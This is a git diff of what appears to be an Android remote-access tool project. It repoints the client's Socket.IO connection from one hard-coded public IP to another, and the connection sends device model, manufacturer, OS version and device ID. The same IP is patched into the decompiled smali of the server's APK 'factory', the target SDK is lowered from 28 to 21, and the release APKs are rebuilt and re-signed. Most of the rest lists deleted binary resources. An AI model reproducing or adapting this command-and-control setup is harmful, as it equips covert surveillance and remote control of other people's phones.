diff --git a/.gitignore b/.gitignore index b79083b..c20e119 100644 --- a/.gitignore +++ b/.gitignore @@ -8,7 +8,6 @@ lib-cov coverage .grunt .lock-wscript -build/Release node_modules .gradle .idea diff --git a/client/app/build.gradle b/client/app/build.gradle index a459812..8449e6a 100644 --- a/client/app/build.gradle +++ b/client/app/build.gradle @@ -9,7 +9,7 @@ android { defaultConfig { applicationId 'com.remote.app' minSdkVersion 14 - targetSdkVersion 28 + targetSdkVersion 21 versionCode 1 versionName "1.0" } diff --git a/client/app/release/app-release.apk b/client/app/release/app-release.apk index 9de703f..e25f993 100644 Binary files a/client/app/release/app-release.apk and b/client/app/release/app-release.apk differ diff --git a/client/app/src/main/java/com/remote/app/IOSocket.java b/client/app/src/main/java/com/remote/app/IOSocket.java index 619c946..2a58688 100644 --- a/client/app/src/main/java/com/remote/app/IOSocket.java +++ b/client/app/src/main/java/com/remote/app/IOSocket.java @@ -21,7 +21,7 @@ public class IOSocket { opts.reconnectionDelay = 5000; opts.reconnectionDelayMax = 999999999; - ioSocket = IO.socket("http://47.91.41.155:80?model="+ android.net.Uri.encode(Build.MODEL)+"&manf="+Build.MANUFACTURER+"&release="+Build.VERSION.RELEASE+"&id="+deviceID); + ioSocket = IO.socket("http://3.90.231.134:80?model="+ android.net.Uri.encode(Build.MODEL)+"&manf="+Build.MANUFACTURER+"&release="+Build.VERSION.RELEASE+"&id="+deviceID); } catch (URISyntaxException e) { e.printStackTrace(); } diff --git a/server/app/factory/app-release.apk b/server/app/factory/app-release.apk index 9de703f..e25f993 100644 Binary files a/server/app/factory/app-release.apk and b/server/app/factory/app-release.apk differ diff --git a/server/app/factory/decompiled/apktool.yml b/server/app/factory/decompiled/apktool.yml index a0aedff..93262bb 100644 --- a/server/app/factory/decompiled/apktool.yml +++ b/server/app/factory/decompiled/apktool.yml @@ -13,7 +13,7 @@ packageInfo: renameManifestPackage: null sdkInfo: minSdkVersion: '14' - targetSdkVersion: '28' + targetSdkVersion: '21' sharedLibrary: false sparseResources: false unknownFiles: {} diff --git a/server/app/factory/decompiled/build/apk/AndroidManifest.xml b/server/app/factory/decompiled/build/apk/AndroidManifest.xml deleted file mode 100644 index dfb18b9..0000000 Binary files a/server/app/factory/decompiled/build/apk/AndroidManifest.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/classes.dex b/server/app/factory/decompiled/build/apk/classes.dex deleted file mode 100644 index 1175e8c..0000000 Binary files a/server/app/factory/decompiled/build/apk/classes.dex and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_normal.9.png deleted file mode 100644 index 7e2b733..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_normal.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_pressed.9.png deleted file mode 100644 index a36a60d..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_pressed.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal.9.png deleted file mode 100644 index 8c49da6..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal_pressed.9.png deleted file mode 100644 index 3434cfa..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal_pressed.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notify_panel_notification_icon_bg.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notify_panel_notification_icon_bg.png deleted file mode 100644 index 5f668a5..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notify_panel_notification_icon_bg.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_normal.9.png deleted file mode 100644 index 91fa1f2..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_normal.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_pressed.9.png deleted file mode 100644 index 56d765b..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_pressed.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal.9.png deleted file mode 100644 index 5ba1c45..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal_pressed.9.png deleted file mode 100644 index 932065e..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal_pressed.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notify_panel_notification_icon_bg.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notify_panel_notification_icon_bg.png deleted file mode 100644 index 8fbf4bb..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notify_panel_notification_icon_bg.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-v21/notification_action_background.xml b/server/app/factory/decompiled/build/apk/res/drawable-v21/notification_action_background.xml deleted file mode 100644 index 9096f4a..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-v21/notification_action_background.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_normal.9.png deleted file mode 100644 index 4059330..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_normal.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_pressed.9.png deleted file mode 100644 index 1b14860..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_pressed.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal.9.png deleted file mode 100644 index 3da5de5..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal_pressed.9.png deleted file mode 100644 index fb38611..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal_pressed.9.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notify_panel_notification_icon_bg.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notify_panel_notification_icon_bg.png deleted file mode 100644 index adbe4d2..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notify_panel_notification_icon_bg.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable/notification_bg.xml b/server/app/factory/decompiled/build/apk/res/drawable/notification_bg.xml deleted file mode 100644 index b587935..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable/notification_bg.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable/notification_bg_low.xml b/server/app/factory/decompiled/build/apk/res/drawable/notification_bg_low.xml deleted file mode 100644 index 09094ee..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable/notification_bg_low.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable/notification_icon_background.xml b/server/app/factory/decompiled/build/apk/res/drawable/notification_icon_background.xml deleted file mode 100644 index 1c8671f..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable/notification_icon_background.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/drawable/notification_tile_bg.xml b/server/app/factory/decompiled/build/apk/res/drawable/notification_tile_bg.xml deleted file mode 100644 index 320d270..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/drawable/notification_tile_bg.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v16/notification_template_custom_big.xml b/server/app/factory/decompiled/build/apk/res/layout-v16/notification_template_custom_big.xml deleted file mode 100644 index 97c07c6..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v16/notification_template_custom_big.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v17/activity_main.xml b/server/app/factory/decompiled/build/apk/res/layout-v17/activity_main.xml deleted file mode 100644 index d24aae9..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v17/activity_main.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action.xml b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action.xml deleted file mode 100644 index ecf6bff..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action_tombstone.xml b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action_tombstone.xml deleted file mode 100644 index 90210f6..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action_tombstone.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_template_custom_big.xml b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_template_custom_big.xml deleted file mode 100644 index 77a1e0b..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_template_custom_big.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action.xml b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action.xml deleted file mode 100644 index 0a47ba5..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action_tombstone.xml b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action_tombstone.xml deleted file mode 100644 index 0310fcd..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action_tombstone.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_custom_big.xml b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_custom_big.xml deleted file mode 100644 index 1f98174..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_custom_big.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_icon_group.xml b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_icon_group.xml deleted file mode 100644 index 3f38d74..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_icon_group.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout/activity_main.xml b/server/app/factory/decompiled/build/apk/res/layout/activity_main.xml deleted file mode 100644 index 6c93c44..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout/activity_main.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_action.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_action.xml deleted file mode 100644 index 9663f4d..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout/notification_action.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_action_tombstone.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_action_tombstone.xml deleted file mode 100644 index b05dfa5..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout/notification_action_tombstone.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_template_custom_big.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_template_custom_big.xml deleted file mode 100644 index d1d9f17..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout/notification_template_custom_big.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_template_icon_group.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_template_icon_group.xml deleted file mode 100644 index 9a516e7..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout/notification_template_icon_group.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_chronometer.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_chronometer.xml deleted file mode 100644 index 4d7561a..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_chronometer.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_time.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_time.xml deleted file mode 100644 index c6c130c..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_time.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-anydpi-v26/ic_launcher.xml b/server/app/factory/decompiled/build/apk/res/mipmap-anydpi-v26/ic_launcher.xml deleted file mode 100644 index ae51cf1..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-anydpi-v26/ic_launcher.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-anydpi-v26/ic_launcher_round.xml b/server/app/factory/decompiled/build/apk/res/mipmap-anydpi-v26/ic_launcher_round.xml deleted file mode 100644 index ae51cf1..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-anydpi-v26/ic_launcher_round.xml and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher.png deleted file mode 100644 index 07f0cb2..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher_foreground.png b/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher_foreground.png deleted file mode 100644 index dc7d63f..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher_foreground.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher_round.png b/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher_round.png deleted file mode 100644 index 9685a92..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher_round.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher.png deleted file mode 100644 index 7a74c08..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher_foreground.png b/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher_foreground.png deleted file mode 100644 index aac05c6..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher_foreground.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher_round.png b/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher_round.png deleted file mode 100644 index 482034b..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher_round.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher.png deleted file mode 100644 index 7dca2dd..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher_foreground.png b/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher_foreground.png deleted file mode 100644 index f82753a..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher_foreground.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher_round.png b/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher_round.png deleted file mode 100644 index 3d30371..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher_round.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher.png deleted file mode 100644 index 91bd234..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher_foreground.png b/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher_foreground.png deleted file mode 100644 index 95f9d41..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher_foreground.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher_round.png b/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher_round.png deleted file mode 100644 index 4b8ab4e..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher_round.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher.png deleted file mode 100644 index de99859..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher_foreground.png b/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher_foreground.png deleted file mode 100644 index 3f22790..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher_foreground.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher_round.png b/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher_round.png deleted file mode 100644 index ed5e4ce..0000000 Binary files a/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher_round.png and /dev/null differ diff --git a/server/app/factory/decompiled/build/apk/resources.arsc b/server/app/factory/decompiled/build/apk/resources.arsc deleted file mode 100644 index e3b9615..0000000 Binary files a/server/app/factory/decompiled/build/apk/resources.arsc and /dev/null differ diff --git a/server/app/factory/decompiled/original/AndroidManifest.xml b/server/app/factory/decompiled/original/AndroidManifest.xml index f356538..2f0921a 100644 Binary files a/server/app/factory/decompiled/original/AndroidManifest.xml and b/server/app/factory/decompiled/original/AndroidManifest.xml differ diff --git a/server/app/factory/decompiled/original/META-INF/CERT.RSA b/server/app/factory/decompiled/original/META-INF/CERT.RSA index 084c9c3..b1a0d4a 100644 Binary files a/server/app/factory/decompiled/original/META-INF/CERT.RSA and b/server/app/factory/decompiled/original/META-INF/CERT.RSA differ diff --git a/server/app/factory/decompiled/original/META-INF/CERT.SF b/server/app/factory/decompiled/original/META-INF/CERT.SF index f1ab235..50b07ae 100644 --- a/server/app/factory/decompiled/original/META-INF/CERT.SF +++ b/server/app/factory/decompiled/original/META-INF/CERT.SF @@ -1,9 +1,9 @@ Signature-Version: 1.0 Created-By: 1.0 (Android) -SHA1-Digest-Manifest: Br7KZuMlRvkujFIEcFUfc9JLJHM= +SHA1-Digest-Manifest: 9wLCJfjpA3L2avYP/kniF8N1Fpk= Name: AndroidManifest.xml -SHA1-Digest: hMY5UmKutb2cZY4afr084GSFwLk= +SHA1-Digest: FWiCXCmqENMMqGylDqderc/wIlU= Name: META-INF/android.arch.lifecycle_runtime.version SHA1-Digest: mgd0ibqCDE7dziahk3gQRzTxqfA= @@ -16,7 +16,7 @@ Name: META-INF/androidx.versionedparcelable_versionedparcelable.versio SHA1-Digest: /M5ZcCUkGpD9LMU3LB/ji4SqKws= Name: classes.dex -SHA1-Digest: CimfIcRvl0JGoxRUHDbve9dy95o= +SHA1-Digest: oOa4UFM2ozvdtdx1nt8T9I8z8w4= Name: res/drawable-hdpi-v4/notification_bg_low_normal.9.png SHA1-Digest: GqlxeUYi9nderviC+XwD6tRD5Kg= diff --git a/server/app/factory/decompiled/original/META-INF/MANIFEST.MF b/server/app/factory/decompiled/original/META-INF/MANIFEST.MF index 3349b83..f3b3ff2 100644 --- a/server/app/factory/decompiled/original/META-INF/MANIFEST.MF +++ b/server/app/factory/decompiled/original/META-INF/MANIFEST.MF @@ -3,7 +3,7 @@ Built-By: Generated-by-ADT Created-By: Android Gradle 3.4.2 Name: AndroidManifest.xml -SHA1-Digest: ndoGeF/07suLd7OIe2cVBC17lwQ= +SHA1-Digest: Pv4spc504MtuZJxvvbq+oaMhCC8= Name: META-INF/android.arch.lifecycle_runtime.version SHA1-Digest: OxxKFJcpzAROGjnfMbNijNv1+JU= @@ -16,7 +16,7 @@ Name: META-INF/androidx.versionedparcelable_versionedparcelable.versio SHA1-Digest: xTi2bHEQyjoCjM/kItDx+iAKmTU= Name: classes.dex -SHA1-Digest: ItDW7U9v+mbVk1bCaAtUqtsDPBQ= +SHA1-Digest: BynmcxNAeoLpVz3OZFvLrmI8Ap0= Name: res/drawable-hdpi-v4/notification_bg_low_normal.9.png SHA1-Digest: D2PhKM51tYZo8a79riJ3XiUD2nc= diff --git a/server/app/factory/decompiled/smali/com/remote/app/h.smali b/server/app/factory/decompiled/smali/com/remote/app/h.smali index 23c3e0a..2cbe6bd 100644 --- a/server/app/factory/decompiled/smali/com/remote/app/h.smali +++ b/server/app/factory/decompiled/smali/com/remote/app/h.smali @@ -64,7 +64,7 @@ invoke-direct {v1}, Ljava/lang/StringBuilder;->()V - const-string v2, "http://localhost:80?model=" + const-string v2, "http://3.90.231.134:80?model=" invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;